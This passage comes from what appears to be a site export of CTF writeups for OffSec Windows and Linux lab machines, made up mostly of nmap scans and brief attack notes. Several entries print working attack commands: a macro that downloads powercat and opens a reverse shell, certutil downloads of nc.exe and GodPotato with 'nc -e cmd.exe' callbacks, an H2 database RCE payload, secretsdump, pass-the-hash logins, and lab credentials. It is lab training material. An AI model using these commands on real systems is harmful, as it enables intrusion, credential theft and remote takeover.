| ssl-cert: Subject: commonName=ResourceDC.resourced.local | Not valid before: 2026-03-29T12:49:54 |_Not valid after: 2026-09-28T12:49:54 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc Microsoft Windows RPC 49693/tcp open msrpc Microsoft Windows RPC 49708/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (92%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (92%), Microsoft Windows 10 1903 - 21H1 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). 
Network Distance: 4 hops Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows SMB # looks like we got some juice\nV.Ventz :: Hotelcalifornia194!\nfrom the password audit we were able to grab\nsecurity system ntds.dit ntds.jfm\nimpacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY local | tee dmp.txt [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94 [*] Reading and decrypting hashes from ntds.dit 
Administrator password cracks Administrator:ItachiUchiha888\nlet's get in\nDirbusting # Port 80 # Exploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nfrom the hashes we got earlier this one combo works\nevil-winrm -i $IP -u resourced.local\\\\L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 we follow my GenericAll RBCD procedure and get the flag\n","date":"30 March 2026","externalUrl":null,"permalink":"/ctf-writeups/resourced/","section":"CTF Writeups","summary":"","title":"Resourced","type":"ctf-writeups"},{"content":" Craft # Overview # OS: Windows IP: 192.168.222.169 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access with macro doc, privesc with lateral movement for better privs.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 04:26 EDT Nmap scan report for 192.168.222.169 Host is up (0.095s latency). 
Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7) |_http-title: Craft |_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (92%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (92%), Microsoft Windows 10 1903 - 21H1 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 80.75 ms 192.168.45.1 2 80.72 ms 192.168.45.254 3 80.77 ms 192.168.251.1 4 81.05 ms 192.168.222.169 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 29.67 seconds Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # let's follow this\nhttps://github.com/jotyGill/macro-generator\nLooks like it's working, so let's make it a revshell\nlet's replace with this and run it\nShell(\u0026#34;cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString(\u0026#39;http://192.168.45.154/powercat.ps1\u0026#39;);powercat -c 192.168.45.154 -p 135 -e powershell\u0026#34;) we have write over this and we know that there is another user called apache, so let's laterally move\nwe have impersonate priv on this user\n","date":"29 March 2026","externalUrl":null,"permalink":"/ctf-writeups/craft/","section":"CTF Writeups","summary":"","title":"Craft","type":"ctf-writeups"},{"content":" Hutch # Overview # OS: Windows IP: 192.168.222.122 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # initial access through creds leaked with the --users ldap flag and then foothold with webdav cmdshell, privesc with 
exposed admin creds in laps.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server | http-webdav-scan: | WebDAV type: Unknown | Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK | Server Date: Sun, 29 Mar 2026 11:18:33 GMT | Server Type: Microsoft-IIS/10.0 |_ Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-29 11:17:39Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49676/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 49766/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (92%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (92%), Microsoft Windows 10 1903 - 21H1 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). 
Network Distance: 4 hops Dirbusting # LDAP # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Got creds through LDAP as fmcsorley : CrabSharkJellyfish192\nand we have users, so let's try roasting first and see if we get more.\nASREP # Well, let's fall back and check our access; we now have access to LDAP and SMB with these new creds, so let's enumerate them.\nLeave this; we are able to cadaver with these creds, so let's gen a payload to use.\nWe put our webshell up and ran this nice code I got from revshellgen.\nLet's escalate now.\nQn;0$-v3+W47W6\n","date":"29 March 2026","externalUrl":null,"permalink":"/ctf-writeups/hutch/","section":"CTF Writeups","summary":"","title":"Hutch","type":"ctf-writeups"},{"content":" Internal # Overview # OS: Windows IP: 192.168.222.40 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # simple outdated samba.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Dirbusting # Port 80 # Exploitation # msfconsole search cve:CVE-2009-3103 use exploit/windows/smb/ms09_050_smb2_negotiate_func_index set RHOSTS set LHOST run\n","date":"29 March 2026","externalUrl":null,"permalink":"/ctf-writeups/internal/","section":"CTF Writeups","summary":"","title":"Internal","type":"ctf-writeups"},{"content":" Jacko # Overview # OS: Windows IP: 192.168.222.66 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for Jacko, including enumeration, exploitation, and privilege escalation.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: H2 Database Engine (redirect) | http-methods: |_ Potentially risky methods: TRACE 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open 
microsoft-ds? 5040/tcp open unknown 8082/tcp open http H2 database http console |_http-title: H2 Console 9092/tcp open XmlIpcRegSvc? 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
TCP/IP fingerprint: Network Distance: 4 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2026-03-29T13:33:42 |_ start_date: N/A TRACEROUTE (using port 8888/tcp) HOP RTT ADDRESS 1 81.28 ms 192.168.45.1 2 81.26 ms 192.168.45.254 3 81.89 ms 192.168.251.1 4 78.27 ms 192.168.222.66 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 203.70 seconds Dirbusting # Port 8082 # Exploitation # Following this:\nhttps://www.exploit-db.com/exploits/49384\nWe have code exec.\ncertutil -urlcache -split -f http://192.168.45.159:80/nc.exe C:/Users/Public/Documents/nc.exe cmd.exe /c C:/Users/Public/Documents/nc.exe -e cmd.exe 192.168.45.159 4444 CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR \u0026#34;JNIScriptEngine.eval\u0026#34;; CALL JNIScriptEngine_eval(\u0026#39;new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\u0026#34;certutil -urlcache -split -f http://192.168.45.159:80/GodPotato-NET4.exe C:/Users/Public/Documents/GodPotato.exe\u0026#34;).getInputStream()).useDelimiter(\u0026#34;\\\\Z\u0026#34;).next()\u0026#39;); ","date":"29 March 2026","externalUrl":null,"permalink":"/ctf-writeups/jacko/","section":"CTF Writeups","summary":"","title":"Jacko","type":"ctf-writeups"},{"content":" Authby # Overview # OS: Windows IP: 192.168.217.46 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE via FTP, privesc with JuicyPotato.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # **21/tcp open ftp zFTPServer 6.0 build 2011-10-17** | ftp-anon: Anonymous FTP login allowed (FTP code 230) | total 9680 | ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe | ---------- 1 root root 25 Feb 10 2011 UninstallService.bat | ---------- 1 root root 
4284928 Oct 18 2011 Uninstall.exe | ---------- 1 root root 17 Aug 13 2011 StopService.bat | ---------- 1 root root 18 Aug 13 2011 StartService.bat | ---------- 1 root root 8736 Nov 09 2011 Settings.ini | dr-xr-xr-x 1 root root 512 Mar 28 23:38 log | ---------- 1 root root 2275 Aug 08 2011 LICENSE.htm | ---------- 1 root root 23 Feb 10 2011 InstallService.bat | dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions | dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates |_dr-xr-xr-x 1 root root 512 Oct 11 00:16 accounts 242/tcp open http Apache httpd 2.2.21 ((Win32) PHP/5.3.8) |_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8 | http-auth: | HTTP/1.1 401 Authorization Required\\x0D |_ Basic realm=Qui e nuce nuculeum esse volt, frangit nucem! |_http-title: 401 Authorization Required 3145/tcp open zftp-admin zFTPServer admin 3389/tcp open ms-wbt-server Microsoft Terminal Service |_ssl-date: 2026-03-28T16:39:18+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: LIVDA | NetBIOS_Domain_Name: LIVDA | NetBIOS_Computer_Name: LIVDA | DNS_Domain_Name: LIVDA | DNS_Computer_Name: LIVDA | Product_Version: 6.0.6001 |_ System_Time: 2026-03-28T16:39:13+00:00 | ssl-cert: Subject: commonName=LIVDA | Not valid before: 2025-10-09T17:16:18 |_Not valid after: 2026-04-10T17:16:18 FTP # We couldn't grab anything, but we found 2 users, admin and offsec, and are able to get in with the creds admin admin.\nWe have write perms, so let's upload a PHP rev shell and browse to it.\nDirbusting # Port 242 # I validated this step using the evidence below before moving forward in the chain.\nExploitation # On visiting the reverse shell after putting it on the FTP server as admin, we have our connection.\nsysteminfo tells us our machine is x86, which is 32-bit,\nand because we have the SeImpersonate priv we can go ahead and use JuicyPotato.\ncertutil -urlcache -split -f http://192.168.45.154/Juicy.Potato.x86.exe The default CLSID didn't work.\n.\\Juicy.Potato.x86.exe -l 1360 -p c:\\windows\\system32\\cmd.exe -a 
\u0026#34;/c whoami\u0026#34; -t * ","date":"28 March 2026","externalUrl":null,"permalink":"/ctf-writeups/authby/","section":"CTF Writeups","summary":"","title":"Authby","type":"ctf-writeups"},{"content":" Algernon # Overview # OS: Windows IP: 192.168.143.58 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # easy RCE as NT.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 04-29-20 10:31PM \u0026lt;DIR\u0026gt; ImapRetrieval | 03-27-26 06:49AM \u0026lt;DIR\u0026gt; Logs | 04-29-20 10:31PM \u0026lt;DIR\u0026gt; PopRetrieval |_04-29-20 10:32PM \u0026lt;DIR\u0026gt; Spool | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 9998/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-IIS/10.0 | http-title: Site doesn\u0026#39;t have a title (text/html; charset=utf-8). 
|_Requested resource was /interface/root | uptime-agent-info: HTTP/1.1 400 Bad Request\\x0D | Content-Type: text/html; charset=us-ascii\\x0D | Server: Microsoft-HTTPAPI/2.0\\x0D | Date: Fri, 27 Mar 2026 13:57:39 GMT\\x0D | Connection: close\\x0D | Content-Length: 326\\x0D | \\x0D | \u0026lt;!DOCTYPE HTML PUBLIC \u0026#34;-//W3C//DTD HTML 4.01//EN\u0026#34;\u0026#34;http://www.w3.org/TR/html4/strict.dtd\u0026#34;\u0026gt;\\x0D | \u0026lt;HTML\u0026gt;\u0026lt;HEAD\u0026gt;\u0026lt;TITLE\u0026gt;Bad Request\u0026lt;/TITLE\u0026gt;\\x0D | \u0026lt;META HTTP-EQUIV=\u0026#34;Content-Type\u0026#34; Content=\u0026#34;text/html; charset=us-ascii\u0026#34;\u0026gt;\u0026lt;/HEAD\u0026gt;\\x0D | \u0026lt;BODY\u0026gt;\u0026lt;h2\u0026gt;Bad Request - Invalid Verb\u0026lt;/h2\u0026gt;\\x0D | \u0026lt;hr\u0026gt;\u0026lt;p\u0026gt;HTTP Error 400. The request verb is invalid.\u0026lt;/p\u0026gt;\\x0D |_\u0026lt;/BODY\u0026gt;\u0026lt;/HTML\u0026gt;\\x0D 17001/tcp open remoting MS .NET Remoting services 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-27T13:57:44 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 213.70 seconds Dirbusting # Port 9998 # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\n","date":"27 March 2026","externalUrl":null,"permalink":"/ctf-writeups/algernon/","section":"CTF Writeups","summary":"","title":"Algernon","type":"ctf-writeups"},{"content":" CVE-2023-6019 # Overview # OS: Linux IP: 192.168.143.37 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # man this was literally the title and 1 click how is it intermediate.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA) | 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA) |_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519) 9000/tcp open http aiohttp 3.9.1 (Python 3.8) |_http-title: Ray Dashboard |_http-server-header: Python/3.8 aiohttp/3.9.1 36373/tcp open grpc 36977/tcp open grpc 37729/tcp open grpc 38015/tcp open unknown 38811/tcp open grpc 41230/tcp open http WSGIServer 0.2 (Python 3.8.10) |_http-server-header: WSGIServer/0.2 CPython/3.8.10 |_http-title: Site doesn\u0026#39;t have a title (text/plain; version=0.0.4; charset=utf-8). |_http-trane-info: Problem with XML parsing of /evox/about 44217/tcp open http WSGIServer 0.2 (Python 3.8.10) |_http-server-header: WSGIServer/0.2 CPython/3.8.10 |_http-title: Site doesn\u0026#39;t have a title (text/plain; version=0.0.4; charset=utf-8). 44227/tcp open http WSGIServer 0.2 (Python 3.8.10) |_http-server-header: WSGIServer/0.2 CPython/3.8.10 |_http-title: Site doesn\u0026#39;t have a title (text/plain; version=0.0.4; charset=utf-8). 
|_http-trane-info: Problem with XML parsing of /evox/about 46711/tcp open grpc 52365/tcp open http aiohttp 3.9.1 (Python 3.8) |_http-server-header: Python/3.8 aiohttp/3.9.1 |_http-title: Site doesn\u0026#39;t have a title (text/plain; charset=utf-8). 59137/tcp open unknown 59484/tcp open grpc Dirbusting # Port 80 # Exploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/cve-2023-6019/","section":"CTF Writeups","summary":"","title":"CVE-2023-6019","type":"ctf-writeups"},{"content":"","date":"26 March 2026","externalUrl":null,"permalink":"/tags/linux/","section":"Tags","summary":"","title":"Linux","type":"tags"},{"content":" Ochima # Overview # OS: Linux IP: 192.168.143.32 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # easy RCE with exploit and then privesc with cronjob.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-26 09:53 EDT Nmap scan report for 192.168.143.32 Host is up (0.083s latency). 
Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.52 (Ubuntu) 8338/tcp open http Python http.server 3.5 - 3.10 |_http-server-header: Maltrail/0.52 |_http-title: Maltrail | http-robots.txt: 1 disallowed entry |_/ Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nPort 8338 # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nside) ## filter_netmask(s) is/are used to filter results USERS admin:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:0: # changeme! ## local:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:1000:192.168.0.0/16 # changeme! 
## Mask custom trail names for non-admin users (UID \u0026gt;= 1000) ENABLE_MASK_CUSTOM true i think there is a cron job running given the existence of the etc_backup.tar file\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/ochima/","section":"CTF Writeups","summary":"","title":"Ochima","type":"ctf-writeups"},{"content":" Payday # Overview # OS: Linux IP: 192.168.143.39 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # easy RCE and privesc with same user same pass and sudo all.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0) | ssh-hostkey: | 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA) |_ 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA) 80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) |_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6 |_http-title: CS-Cart. Powerful PHP shopping cart software 110/tcp open pop3 Dovecot pop3d | ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2008-04-25T02:02:48 |_Not valid after: 2008-05-25T02:02:48 |_ssl-date: 2026-03-26T17:59:28+00:00; +8s from scanner time. 
|_pop3-capabilities: TOP RESP-CODES UIDL SASL STLS CAPA PIPELINING | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 |_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME) 143/tcp open imap Dovecot imapd | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 |_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2008-04-25T02:02:48 |_Not valid after: 2008-05-25T02:02:48 |_ssl-date: 2026-03-26T17:59:29+00:00; +8s from scanner time. |_imap-capabilities: completed IDLE Capability OK IMAP4rev1 MULTIAPPEND LOGINDISABLEDA0001 CHILDREN NAMESPACE LOGIN-REFERRALS LITERAL+ SORT UNSELECT SASL-IR STARTTLS THREAD=REFERENCES 445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME) 993/tcp open ssl/imap Dovecot imapd | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 |_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 |_ssl-date: 2026-03-26T17:59:28+00:00; +8s from scanner time. | ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2008-04-25T02:02:48 |_Not valid after: 2008-05-25T02:02:48 995/tcp open ssl/pop3 Dovecot pop3d | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 |_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 |_pop3-capabilities: TOP RESP-CODES UIDL SASL(PLAIN) USER CAPA PIPELINING |_ssl-date: 2026-03-26T17:59:29+00:00; +9s from scanner time. 
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2008-04-25T02:02:48 |_Not valid after: 2008-05-25T02:02:48 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) | smb-os-discovery: | OS: Unix (Samba 3.0.26a) | Computer name: payday | NetBIOS computer name: | Domain name: | FQDN: payday |_ System time: 2026-03-26T13:59:16-04:00 |_clock-skew: mean: 40m08s, deviation: 1h37m59s, median: 7s |_nbstat: NetBIOS name: PAYDAY, NetBIOS user: \u0026lt;unknown\u0026gt;, NetBIOS MAC: \u0026lt;unknown\u0026gt; (unknown) Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/payday/","section":"CTF Writeups","summary":"","title":"Payday","type":"ctf-writeups"},{"content":" Sea # Overview # OS: Linux IP: 192.168.143.162 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # exposed creds.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.159 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.5 - 
secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-rw-r-- 1 0 0 5637 Jun 14 2025 log_01.log | -rw-rw-r-- 1 0 0 7181 Jun 15 2025 log_02.log | -rw-rw-r-- 1 0 0 5627 Jun 14 2025 log_03.log |_-rw-rw-r-- 1 0 0 5687 Jun 14 2025 log_04.log 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA) |_ 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519) 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) |_http-server-header: Apache/2.4.58 (Ubuntu) |_http-title: Villa Agency - Real Estate HTML5 Template 55743/tcp open http Apache httpd 2.4.58 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.58 (Ubuntu) |_http-title: Sea Device type: general purpose Running: Linux 5.X OS CPE: cpe:/o:linux:linux_kernel:5 Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nPort 55743 # I validated this step using the evidence below before moving forward in the chain.\nFTP # I validated this step using the evidence below before moving forward in the chain.\nExploitation # These don't seem to work; then I realized that I was looking at the wrong directory.\nWell, the old pass worked for root.\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/sea/","section":"CTF Writeups","summary":"","title":"Sea","type":"ctf-writeups"},{"content":" Snookums # Overview # OS: Linux IP: 192.168.143.58 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # easy RCE and privesc, double b64.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 21/tcp open ftp vsftpd 3.0.2 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can\u0026#39;t get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.45.159 | 
